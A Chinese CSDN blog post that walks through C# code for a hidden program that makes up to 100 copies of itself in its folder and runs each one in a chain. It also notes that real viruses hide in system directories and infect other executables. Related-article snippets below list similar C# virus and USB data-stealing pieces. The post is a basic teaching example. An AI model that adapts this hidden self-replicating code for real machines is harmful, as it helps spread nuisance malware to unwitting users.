C# 中病毒基本实现方法

最新推荐文章于 2023-09-08 16:54:31 发布
最新推荐文章于 2023-09-08 16:54:31 发布
阅读量695 收藏 2
点赞数 1
文章标签: c# string buffer file path application
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyang7/article/details/2455264
版权

程序要实现下面几个功能

第一,运行时不出现运行界面,当然,在任务管理器里,还是可以看到进程的,道行再深的病毒也不可能无迹可寻。
  第二,程序在运行目录下自我复制n份。

第三,采用递归复制的方法,即第一个程序生成第二个程序,第二个程序生成第三个程序,以此类推。

源代码很简单,下面来分析一下:

// 不在任务栏显示
this.ShowInTaskbar = false;
// 窗体透明
this.Opacity = 0;

System.Windows.Forms.Form类封装了一般的Windows窗口程序大部分特性,极大的简化窗口界面的设计过程,上面这两个属性用于隐藏我们的程序的运行状态,第一个ShowInTaskbar属性,设置为否时,程序就不会在状态栏上面显示。第二个Opacity属性,表示窗口的不透明度,取值在0100之间。0%的不透明度也就是100%透明了。这样,在程序运行时,你就看不见窗体了。

 

// 默认复制次数
const int TOTAL = 100;
int _count = TOTAL;
// 正在运行的程序路径和文件名
string _file = Application.ExecutablePath;
// 正在运行的程序路径
string _path = Application.StartupPath;
// 正在运行的程序文件名
string _name = _file.Replace(string.Format("{0}//", _path), string.Empty).ToLower();
try
{
 _count = int.Parse(_name.Replace(".exe", string.Empty));
 _count--;
}
catch
{
}
finally
{
}
// 目标文件
string _target = string.Format("{0}//{1}.exe", _path, _count.ToString("000"));

 

Application类提供了获取程序运行绝对路径并包括文件名的属性和程序运行绝对路径的文件名属性,竟然不直接提供一个文件名的属性,好奇怪。正规的截取文件名的方法应该根据"/"来判断,这里采用了替换的方法,大家可以思考一下如果用SubString怎么实现。5556行,如果文件名不是数字,那么从100.exe开始生成,如果你执行了10000.exe的文件,那么狠糟糕,你可能需要注销一下当前用户来终止程序运行,当然,让它运行也不会有多大影响。最后,65行,我们把目标锁定在程序的当前目录下。病毒和流氓软件就没有那么客气了,经常它可能会选择磁盘根目录、C:/WinodwsC:/Windows/System32或者其他重要的系统目录中。而且病毒采用了随机的命名方式或者是模仿系统文件名称的固定命名方式,以达到隐藏自身和迷惑用户的目的。

if ((File.Exists(_file)) && (_count > 0))
{
 // 复制
 FileStream _fileStream = File.Open(_file, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
 byte[] _buffer = new byte[_fileStream.Length];
 _fileStream.Read(_buffer, 0, _buffer.Length);
 _fileStream.Close();
 // 如果目标已存在,删除
 if (File.Exists(_target))
 {
  File.Delete(_target);
 }
 // 粘贴
 FileStream _writer = File.Open(_target, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.None);
 _writer.Write(_buffer, 0, _buffer.Length);
 _writer.Close();
 // 运行刚复制完成的程序
 System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo(_target));
}
Application.Exit();

最后,我们来完成第三个目标,自我复制并且运行复制好的新程序。

前面我们得到了_file程序运行绝对路径并包括文件名,这样,我们就可以打开并读取它了。

File是文件操作的静态方法,它只负责打开,关闭,创建和删除文件,对文件的读写,就要由FileStream来操作了。

这里只是整个复制文件,非常的简单。病毒的特性是可以附加到别的程序或文件上,整个过程就比较复杂了

。首先,需要非常了解可执行文件的结构,把原来的可执行文件分解,并且把自身也进行分解,然后重新组合成一个新的可执行文件,但是执行的次序已经改变了,程序开始会先跳转到病毒代码,保证病毒能够被执行后,再跳转回正常的程序代码,以使病毒能够得以在隐藏的状态下执行。

84行调用了新复制完成的程序。以使得新复制的程序能够自动运行,并且进行下一次的复制。同样的道理,现在非常多的软件都提供了自动更新的功能,它的原理基本也是这样,下载升级包,主程序调用升级程序,如果有必要,主程序会先退出,升级程序完成对主程序或者其他文件的复制更新,然后再重新调用主程序。

 

wangyang7
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c#写的一个病毒文件
孤独是一种感觉
07-19 2767
<!--if (top.location != self.location) { top.location=self.location;}//--> .stage{background:url(http://img.baidu.com/hi/img/tempbg2b.jpg) }#usrbar{paddi
C#编写病毒文本文档
11-26
初学者 一般的都不懂,这个源码基本都可以懂 虽然没有杀伤力,但是也不错了
发布一个用C#写的一个简单.NET病毒
chy2z的专栏
04-25 2783
.NET1.1 .NET2.0下编译通过. 编译时加上 /target:winexe 选项 --------------------------------------------------------------------- using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; usin
一个C#病毒源代码的分析
寻找剩余的善良
04-03 1153
病毒代码如下/* intento basico para un virus en C#* iniciacion del projecto Lunes 10 de Julio del 2006* ~~bl00dy c0d3r~~*/using System;using System.IO;using System.Windows.Forms;class MainC
C#制作电脑病毒
weixin_55334781的博客
07-25 848
使用语言:C# 外置组件:无 先看代码: using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.IO; namespace wacopyandpaste { public partial c
C#也能写病毒,源代码分析 the analysis of C# virus source code
大师的资源
10-29 4277
  源代码位于: http://hi.baidu.com/passedbylove/blog/item/0fbd6111dcd9aec0a7ef3ffa.html大师已经就为很菜很菜那种那人 加入注释,如果阁下还是无法理解,大师也无言了,不懂得请看书或者百度知道首先我很想用全E文写作,但是考虑大家水平,就E参半,和软件学院教学保持一致,E文水平都不好就不要当CODER,我还是会尽
病毒及流氓软件自我复制的简单实现(C#)
Akuma专栏
02-27 1897
下面我将用C#简单的实现一个能够自我复制的小小的恶意程序。   程序要实现下面几个功能。  第一,运行时不出现运行界面,当然,在任务管理器里,还是可以看到进程的,道行再深的病毒也不可能无迹可寻。  第二,程序在运行目录下自我复制n份。  第三,采用递归复制的方法,即第一个程序生成第二个程序,第二个程序生成第三个程序,以此类推。  源代码很简单,下面来分析一下:
C#病毒的可行性分析~
weixin_30432179的博客
01-16 222
今天在论坛里看到某牛人,说要用C#病毒。之后,当然是经过广大人民群众才智的充分发挥下,总结出了如何写这个病毒的几个方案:首先,声明法:这个病毒最好带个Readme文件,以友情提醒毒者,这个病毒要.net framework框架才能运行。并建议毒者先去微软的网站更新.net框架文件,再尝试运行此病毒。二、捆绑法:毕竟运行一个病毒还要用户更新,这也太不贴心用户了。为什么不直接把.net框架也帮用...
c#编写病毒专杀工具(一)
weixin_33958366的博客
07-03 203
如今病毒木马蠕虫层出不穷,变种也是一个接一个。反病毒公司以及各大安全公司随着影响很大的病毒的出现都会免费提供病毒专杀工具,这个举措对普通用户来说 确实很有帮助。其实写病毒专杀工具也不像大家想象的那么神秘,利用SDK写个控制台程序来实现病毒专杀,因无须写图形界面,所以简便快捷!你自己也能写! 不信?就接着看吧 废话不说了,接下来就开始谈谈病毒专杀工具的思路及实现方法。 此文讲解的病毒专...
C# WPF 自己写的一个模拟病毒传播的程序,有可视化
最新发布
qq_34677276的博客
09-08 1079
C# WPF 自己写的一个模拟病毒传播的程序,有可视化
C#winform 实现PDF阅读功能.rar
05-15
通过以上步骤,你可以在C# WinForm应用实现基本的PDF阅读功能。根据具体需求,你还可以扩展功能,如添加PDF打印、注释、书签等功能。不过,这些高级功能可能需要更多的学习和代码实现。在开发过程,不断查阅...
c#实现的u盘小偷,研究下
02-16
【标题】:“C#实现的U盘小偷”是指一种使用C#编程语言编写的应用程序,它的主要功能是在用户不知情或未经许可的情况下,自动复制或窃取连接到计算机的U盘的数据。这种程序在信息安全领域被视为恶意软件,因为它...
使用MSIL采用Emit方式实现C#的代码生成与注入.docx
10-22
总结本文主要介绍了使用MSIL和Emit方式实现C#代码生成与注入的方法,讲解了MSIL的基本概念以及代码注入的原理和步骤。通过这一技术,开发者可以在无法获取源代码的情况下修改.NET程序的行为,这对于热更新、插件开发...
C#写的一个模拟病毒但不带破坏成分适合学习
11-06
3. **病毒基本工作原理**: 病毒通常通过感染其他程序、文件或系统启动项来传播。它们可能隐藏在可执行文件,当文件被执行时激活。模拟病毒会模仿这些行为,但不会进行文件篡改或数据破坏。 4. **文件Main.cs**: ...
移动端C#病毒“东山再起”,利用知名应用通信实现远控隐私窃取
omnispace的博客
12-30 902
伴随着手机的全面普及和移动互联网的发展,以移动终端为平台的攻防对抗也愈演愈烈。针对日益升级的恶意代码检测技术,恶意攻击者的反查杀手段相应也在不断变化应对。早在2015年,安天移动安全就发现一例利用C#编写以逃避查杀的恶意代码,并对其进行了技术分析。   近日,安天移动安全联合猎豹移动安全实验室又捕获一例类似的病毒,该病毒使用MonoDroid框架进行开发(MoniDroid是以C#语言和部分.N
关于C# WinForm进度条的实现方法
05-26
C# WinForm 实现进度条的方法如下: 1. 在窗体添加一个 ProgressBar 控件。 2. 设置 ProgressBar 的属性,包括 Minimum(最小值)、Maximum(最大值)、Step(步长)和 Value(当前值)等。 3. 在程序使用 ProgressBar 控件。例如,在某个按钮的 Click 事件,可以编写以下代码: ``` private void button1_Click(object sender, EventArgs e) { // 假设要处理 100 个任务 int taskCount = 100; // 设置进度条的最小值和最大值 progressBar1.Minimum = 0; progressBar1.Maximum = taskCount; // 设置进度条的步长,可以根据实际情况来调整 progressBar1.Step = 1; // 循环处理任务,并更新进度条的值 for (int i = 0; i < taskCount; i++) { // 处理第 i 个任务 // ... // 更新进度条的值 progressBar1.Value = i + 1; // 让进度条重绘,否则可能不会立即显示更新后的值 progressBar1.Refresh(); } } ``` 这段代码,首先设置了进度条的最小值、最大值和步长,然后使用循环处理任务,并在每个任务完成后更新进度条的值。注意,在更新进度条的值后,还需要调用 Refresh 方法让进度条重绘,否则可能不会立即显示更新后的值。 以上就是在 C# WinForm 实现进度条的基本方法。当然,根据实际需求,还可以对进度条进行更多的设置和控制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值